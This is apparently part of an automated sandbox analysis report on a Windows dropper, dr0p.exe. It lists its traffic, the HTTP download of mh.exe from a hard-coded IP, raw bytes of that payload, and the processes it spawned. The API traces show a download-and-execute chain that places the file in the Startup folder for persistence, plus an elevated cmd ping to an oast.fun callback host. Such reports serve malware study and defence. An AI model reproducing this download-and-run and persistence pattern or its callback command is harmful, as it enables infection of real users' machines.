Jan 6, 2025 06:03:59.632241011 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632249117 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632256031 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632258892 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632275105 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632294893 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632745981 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632755995 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632766962 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632776976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632783890 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632786989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632797003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632806063 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632807016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632817984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632824898 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632827997 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632838011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632848024 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632855892 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632858038 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632869005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632874966 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632879019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632889032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632894039 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632900953 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632910013 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632930040 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632930994 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632949114 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.633152008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.633162022 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.633172989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.633183002 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.633193016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.633200884 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.633203983 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.633213997 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.633220911 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.633260012 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.633260012 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.719923019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.719944954 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.719958067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.719969034 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.719980001 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.719991922 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720072031 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720093966 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720107079 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720113039 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720118046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720127106 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720134020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720144033 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720176935 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720249891 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720261097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720272064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720278978 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720283031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720299006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720308065 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720319033 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720338106 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720362902 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720416069 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720427036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720437050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720453978 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720478058 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720539093 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720550060 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720560074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720566988 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720568895 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720575094 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720581055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720592976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.720601082 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.720628977 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:04:01.777318001 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:04:37.509735107 CET	60428	53	192.168.2.6	162.159.36.2
Jan 6, 2025 06:04:37.514574051 CET	53	60428	162.159.36.2	192.168.2.6
Jan 6, 2025 06:04:37.514642954 CET	60428	53	192.168.2.6	162.159.36.2
Jan 6, 2025 06:04:37.519498110 CET	53	60428	162.159.36.2	192.168.2.6
Jan 6, 2025 06:04:37.987791061 CET	60428	53	192.168.2.6	162.159.36.2
Jan 6, 2025 06:04:37.992758036 CET	53	60428	162.159.36.2	192.168.2.6
Jan 6, 2025 06:04:37.992810965 CET	60428	53	192.168.2.6	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 06:04:37.509177923 CET	53	56066	162.159.36.2	192.168.2.6
Jan 6, 2025 06:04:38.372401953 CET	53	61878	1.1.1.1	192.168.2.6

HTTP Request Dependency Graph

23.27.51.244

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	23.27.51.244	80	5412	C:\Users\user\Desktop\dr0p.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 06:03:57.674489975 CET	94	OUT	GET /mh.exe HTTP/1.1 User-Agent: Mozilla/5.0 Host: 23.27.51.244 Cache-Control: no-cache
Jan 6, 2025 06:03:58.177469969 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 05:03:58 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 06 Jan 2025 04:27:52 GMT ETag: "1d3dc2-62b020d388200" Accept-Ranges: bytes Content-Length: 1916354 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 84 32 e2 60 e5 5c b1 60 e5 5c b1 60 e5 5c b1 d4 79 ad b1 68 e5 5c b1 d4 79 af b1 eb e5 5c b1 d4 79 ae b1 6d e5 5c b1 e0 9e a1 b1 62 e5 5c b1 e0 9e 58 b0 72 e5 5c b1 e0 9e 5f b0 6a e5 5c b1 e0 9e 59 b0 59 e5 5c b1 69 9d df b1 69 e5 5c b1 69 9d db b1 62 e5 5c b1 69 9d cf b1 67 e5 5c b1 60 e5 5d b1 43 e4 5c b1 ee 9e 59 b0 52 e5 5c b1 ee 9e 5c b0 61 e5 5c b1 ee 9e a3 b1 61 e5 5c b1 ee 9e 5e b0 61 e5 5c b1 52 69 63 68 60 e5 5c b1 00 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 23 97 40 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 21 00 68 04 00 00 38 03 00 00 00 00 00 e0 2e 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$2`\`\`\yh\y\ym\b\Xr\_j\YY\ii\ib\ig\`]C\YR\\a\a\^a\Rich`\PEd#@f"!h8.@`4P`l0p6T7(@ .textngh `.rdata(*l@@.data\@.pdatal02@@.didat`@_RDATA\@@.rsrc`@@.relocp@B
Jan 6, 2025 06:03:58.177490950 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8d 0d 39 b9 05 00 e9 10 8e 00 00 cc cc cc cc 48 8d 0d c9 f9 05 00 e9 b8 a4 00 00 cc cc cc cc 48 83 ec 28 48 8d 0d 35 Data Ascii: H9HH(H5dHeH(HeH(jH(HjHelHe\H(HlHeH(8He,
Jan 6, 2025 06:03:58.177501917 CET	1236	IN	Data Raw: 01 00 00 48 8b 69 18 48 83 ca 07 45 33 e4 48 3b d3 77 11 48 8b cd 48 8b c3 48 d1 e9 48 2b c1 48 3b e8 76 10 48 b8 ff ff ff ff ff ff ff 7f 48 8d 0c 00 eb 31 48 8d 04 29 48 8b da 48 3b d0 48 0f 42 d8 48 b8 ff ff ff ff ff ff ff 7f 48 8d 4b 01 48 3b Data Ascii: HiHE3H;wHHHH+H;vHH1H)HH;HBHHKH;HHrLHHtIH_IK6LwLH fD$3Hr1HHmHrLAH'I+HAHw3IH7HH\$@Hl$HHt$PH\|$XH A
Jan 6, 2025 06:03:58.177511930 CET	1236	IN	Data Raw: 48 83 ec 20 48 8b 19 48 85 db 74 49 48 8b 0b 48 85 c9 74 41 48 8b 53 10 48 2b d1 48 d1 fa 48 03 d2 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1c 49 8b c8 e8 47 08 03 00 48 83 23 00 48 83 63 08 00 48 83 Data Ascii: H HHtIHHtAHSH+HHHrLAH'I+HAHwIGH#HcHcH [&_@SH HHHtAHSH+HHHrLAH'I+HAHwIH#HcHcH [^H9HHH\$WH H
Jan 6, 2025 06:03:58.177524090 CET	1236	IN	Data Raw: 72 32 48 8d 14 55 02 00 00 00 48 8b 4d 00 48 8b c1 48 81 fa 00 10 00 00 72 15 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 28 e8 86 03 03 00 8a c3 48 8b 8d a0 00 00 00 48 33 cc e8 89 04 03 00 48 81 c4 b0 01 00 00 41 5f 41 5e 41 5d Data Ascii: r2HUHMHHrH'HIH+HHw(HH3HA_A^A]_^[]VZPZJZDZ@SVWHHH3H$HIHL$ HSugHd$8HD$pHd$XHL$0Hd$`HD$@H\$0H\|$HD$PAHHt&HH_
Jan 6, 2025 06:03:58.177536011 CET	1236	IN	Data Raw: 72 ef ff ff 48 8d 74 24 30 8d 5d 01 eb 15 48 8b d0 48 8d 4c 24 50 e8 b7 00 00 00 48 8b f0 bb 02 00 00 00 48 89 2f 48 89 6f 10 48 89 6f 18 41 b8 20 00 00 00 48 8b d6 48 8b cf e8 db 12 03 00 48 89 6e 10 48 c7 46 18 07 00 00 00 66 89 2e 83 cb 04 f6 Data Ascii: rHt$0]HHL$PHH/HoHoA HHHnHFf.tHL$Pt>HT$HHr3HUHL$0HHrH'HIH+HHw(?HHL$pH3CH$H_^]UH\$Ht$ WHpHjH3HD$hH
Jan 6, 2025 06:03:58.177547932 CET	1236	IN	Data Raw: dc 49 3b c4 48 0f 43 d8 48 89 5c 24 68 48 81 fb 00 10 00 00 72 12 48 8b cb e8 48 ea ff ff 48 8b f8 48 89 44 24 78 eb 23 33 ff 48 85 db 74 12 48 8b cb e8 9f f9 02 00 48 8b f8 48 89 44 24 78 eb 05 48 89 7c 24 78 48 89 5c 24 68 4c 03 f7 41 8a 45 00 Data Ascii: I;HCH\$hHrHHHHD$x#3HtHHHD$xH\|$xH\$hLAEAHVHLL;tIMFHVILMHH8IH A_A^A]A\_^[xH\$WHHH3H$HHafHn3HL$`D$ DB D$0
Jan 6, 2025 06:03:58.177658081 CET	1236	IN	Data Raw: 41 f8 48 83 f8 1f 0f 87 9d 00 00 00 49 8b c8 e8 2a f5 02 00 48 83 a7 30 14 00 00 00 48 c7 87 38 14 00 00 0f 00 00 00 c6 87 20 14 00 00 00 48 8d 8f 20 10 00 00 e8 88 03 00 00 48 8d 8f 80 0c 00 00 e8 7c 03 00 00 48 8d 8f 20 0c 00 00 e8 80 f2 ff ff Data Ascii: AHI*H0H8 H H\|H H@`ZHLA!LPDBHOhHH\$0H _KH\$Ht$WH H3HHtIHH+HH;rLAH'I
Jan 6, 2025 06:03:58.177669048 CET	332	IN	Data Raw: 5c 24 30 48 83 c4 20 5f e9 35 86 01 00 cc 48 83 c1 48 e9 e7 ed ff ff cc cc cc 40 53 48 83 ec 20 48 8b 51 48 48 8b d9 48 83 fa 10 72 2d 48 8b 49 30 48 ff c2 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1f Data Ascii: \$0H _5HH@SH HQHHHr-HI0HHrLAH'I+HAHwIHc@HCHC0H [FH\$WH H tHH\$0HH _@SH Hu'8iuHS@:(HXH [H
Jan 6, 2025 06:03:58.177679062 CET	1236	IN	Data Raw: 97 c0 eb 43 32 c0 eb 3f e8 f9 14 00 00 48 8b d0 45 33 c0 48 8b 46 20 48 8b cf ff 15 0a 52 04 00 48 8d 15 03 57 04 00 48 8b cf e8 57 3b 00 00 48 85 c0 74 11 48 8b d5 48 8b cf e8 d7 05 00 00 84 c0 74 02 b3 01 8a c3 48 8b 5c 24 30 48 8b 6c 24 38 48 Data Ascii: C2?HE3HF HRHWHW;HtHHtH\$0Hl$8Ht$@H _\tHHHPuHHH\$Ht$WH VHHu27HH@(qQHHHH@E3HHA HJQ@H\$0Ht$8H _
Jan 6, 2025 06:03:58.182389021 CET	1236	IN	Data Raw: 00 b0 01 74 03 41 8a c7 88 87 59 14 00 00 eb 0a 83 f8 02 74 2e 83 f8 05 74 46 48 8b 07 45 33 c0 48 8b 97 48 14 00 00 48 8b cf 48 8b 40 20 ff 15 22 4d 04 00 48 8b cf e8 fa 31 00 00 48 85 c0 75 a5 eb 1d 44 38 bf 55 14 00 00 74 0b 44 38 bf 38 0d 00 Data Ascii: tAYt.tFHE3HHHH@ "MH1HuD8UtD88tAYH@HHDHE3HHH@ LD8UtD8Yt&LG@HI;tIIxrIM@+s@Hy3HrO

Target ID:	0
Start time:	00:03:52
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\dr0p.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dr0p.exe"
Imagebase:	0x400000
File size:	602 bytes
MD5 hash:	D085F244D635D6E43546E63649EA2E67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:03:59
Start date:	06/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe"
Imagebase:	0x7ff741e90000
File size:	1'916'354 bytes
MD5 hash:	287EEBE03B7EC7488ED2AE07A5E98CF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 43%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:03:59
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:03:59
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:04:00
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun
Imagebase:	0xe10000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:04:00
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\q.exe" hm.exe
Imagebase:	0x400000
File size:	139'264 bytes
MD5 hash:	935809D393A2BF9F0E886A41FF5B98BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:04:00
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:04:01
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\hm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\hm.exe"
Imagebase:	0x760000
File size:	4'109'824 bytes
MD5 hash:	692D72923747BE1ED2C05CD6B4118BF4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	00:04:01
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	98.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	100%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0042006A Relevance: 38.6, APIs: 14, Strings: 8, Instructions: 99
filenetworkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/5.0,00000000,00000000,00000000,00000000), ref: 0042008B
InternetOpenUrlA.WININET(00000000,http://23.27.51.244/mh.exe,00000000,00000000,84083000,00000000), ref: 004200A9
SHGetFolderPathA.SHELL32(00000000,00000007,00000000,00000000,?), ref: 004200C5
lstrcat.KERNEL32(?,0042019C), ref: 004200F2
lstrcat.KERNEL32(00000000), ref: 004200F5
CreateFileA.KERNELBASE(00000000), ref: 004200F8
InternetReadFile.WININET(00000000,?,00000800,00000000), ref: 00420113
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 0042012A
CloseHandle.KERNELBASE(00000000), ref: 0042013F
CloseHandle.KERNELBASE(00000000), ref: 00420142
CloseHandle.KERNELBASE(00000000), ref: 00420145
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 0042015C
ShellExecuteA.SHELL32(00000000,runas,cmd.exe,/c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun,00000000,00000000), ref: 00420170
exit.MSVCRT ref: 00420173

Strings

Mozilla/5.0, xrefs: 00420083
msvcrt, xrefs: 00420000, 0042005C, 00420075
.#v, xrefs: 00420139
http://23.27.51.244/mh.exe, xrefs: 004200A3
runas, xrefs: 0042016A
mh.exe, xrefs: 004200E7
/c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun, xrefs: 00420160
cmd.exe, xrefs: 00420165

Memory Dump Source

Source File: 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2157959244.0000000000400000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_dr0p.jbxd

Similarity

API ID: CloseFileHandleInternet$ExecuteOpenShelllstrcat$CreateFolderPathReadWriteexit
String ID: /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun$Mozilla/5.0$cmd.exe$http://23.27.51.244/mh.exe$mh.exe$msvcrt$runas$.#v
API String ID: 75222691-138514472
Opcode ID: 11187015aa9f1c8ff3267cf0e5e2bb0dd4915e9e45076821679b835671d4d3dc
Instruction ID: 8ba6e673de7eaabc5c7a98d1382b7a1bd1208fb1d617d2ae6d2a9a6864d9d083
Opcode Fuzzy Hash: 11187015aa9f1c8ff3267cf0e5e2bb0dd4915e9e45076821679b835671d4d3dc
Instruction Fuzzy Hash: 39218075B4123CBEE73097A19C89FBB7EACDF05790F900062B504A2152C7B95D51CAF8

Function 00420000 Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 123
stringnetworklibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(msvcrt), ref: 0042005D
InternetOpenA.WININET(Mozilla/5.0,00000000,00000000,00000000,00000000), ref: 0042008B
InternetOpenUrlA.WININET(00000000,http://23.27.51.244/mh.exe,00000000,00000000,84083000,00000000), ref: 004200A9
SHGetFolderPathA.SHELL32(00000000,00000007,00000000,00000000,?), ref: 004200C5
lstrcat.KERNEL32(?,0042019C), ref: 004200F2
lstrcat.KERNEL32(00000000), ref: 004200F5
CreateFileA.KERNELBASE(00000000), ref: 004200F8
CloseHandle.KERNELBASE(00000000), ref: 0042013F
CloseHandle.KERNELBASE(00000000), ref: 00420142
CloseHandle.KERNELBASE(00000000), ref: 00420145
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 0042015C
ShellExecuteA.SHELL32(00000000,runas,cmd.exe,/c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun,00000000,00000000), ref: 00420170
exit.MSVCRT ref: 00420173

Strings

Mozilla/5.0, xrefs: 00420083
msvcrt, xrefs: 00420000, 0042005C, 00420075
.#v, xrefs: 00420139
http://23.27.51.244/mh.exe, xrefs: 004200A3
runas, xrefs: 0042016A
mh.exe, xrefs: 004200E7
/c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun, xrefs: 00420160
cmd.exe, xrefs: 00420165

Memory Dump Source

Source File: 00000000.00000002.2157971429.0000000000420000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2157959244.0000000000400000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_dr0p.jbxd

Similarity

API ID: CloseHandle$ExecuteInternetOpenShelllstrcat$CreateFileFolderLibraryLoadPathexit
String ID: /c ping -c 2 jnkmfjqcorurgzffkisb4ndio7bi7glp7.oast.fun$Mozilla/5.0$cmd.exe$http://23.27.51.244/mh.exe$mh.exe$msvcrt$runas$.#v
API String ID: 4046907231-138514472
Opcode ID: e92293144b82b5edbb5eef74653ec4b7faee84ad3c7dee7f2b6cd7358a6f4e55
Instruction ID: b5b0c48799610328507188cbf7613ddd7993b24ffb9f5e1b125bd4a09e144e19
Opcode Fuzzy Hash: e92293144b82b5edbb5eef74653ec4b7faee84ad3c7dee7f2b6cd7358a6f4e55
Instruction Fuzzy Hash: 4631A071740228BFD7209F15DC89F6B7FECEF05754F8140A6B80493253CA79AC11CAA8

Analysis Process: mh.exePID: 1176, Parent PID: 5412COMMON

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	27

Executed Functions

Function 00007FF741EBB190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741E9255C: GetDlgItem.USER32 ref: 00007FF741E925AC
Part of subcall function 00007FF741E9255C: SetWindowTextW.USER32 ref: 00007FF741E925C8

EndDialog.USER32 ref: 00007FF741EBB2D0
SetDlgItemTextW.USER32 ref: 00007FF741EBB320
GetMessageW.USER32 ref: 00007FF741EBB350
IsDialogMessageW.USER32 ref: 00007FF741EBB369
TranslateMessage.USER32 ref: 00007FF741EBB37B
DispatchMessageW.USER32 ref: 00007FF741EBB389
EndDialog.USER32 ref: 00007FF741EBB3D3
GetDlgItem.USER32 ref: 00007FF741EBB410
SendMessageW.USER32 ref: 00007FF741EBB431
SendMessageW.USER32 ref: 00007FF741EBB449
SetFocus.USER32 ref: 00007FF741EBB452
GetLastError.KERNEL32 ref: 00007FF741EBB634
GetLastError.KERNEL32 ref: 00007FF741EBB665
GetTickCount.KERNEL32 ref: 00007FF741EBB68B
GetLastError.KERNEL32 ref: 00007FF741EBB6F5
GetCommandLineW.KERNEL32 ref: 00007FF741EBB841
CreateFileMappingW.KERNEL32 ref: 00007FF741EBB900
MapViewOfFile.KERNEL32 ref: 00007FF741EBB923
Sleep.KERNEL32 ref: 00007FF741EBB9B6
UnmapViewOfFile.KERNEL32 ref: 00007FF741EBB9DF
CloseHandle.KERNEL32 ref: 00007FF741EBB9E8
SetDlgItemTextW.USER32 ref: 00007FF741EBBCDE
DialogBoxParamW.USER32 ref: 00007FF741EBC0D7
EndDialog.USER32 ref: 00007FF741EBC0EF
EnableWindow.USER32 ref: 00007FF741EBC2A6
SendMessageW.USER32 ref: 00007FF741EBC2F8
ShellExecuteExW.SHELL32 ref: 00007FF741EBB95B

Part of subcall function 00007FF741EAAAE0: LoadStringW.USER32 ref: 00007FF741EAAB67
Part of subcall function 00007FF741EAAAE0: LoadStringW.USER32 ref: 00007FF741EAAB80

SendMessageW.USER32 ref: 00007FF741EBBEC3
SendDlgItemMessageW.USER32 ref: 00007FF741EBBEEA
GetDlgItem.USER32 ref: 00007FF741EBBEF8
SendMessageW.USER32 ref: 00007FF741EBBF12
GetDlgItem.USER32 ref: 00007FF741EBBF4F
SetDlgItemTextW.USER32 ref: 00007FF741EBBFEC
SetDlgItemTextW.USER32 ref: 00007FF741EBC004
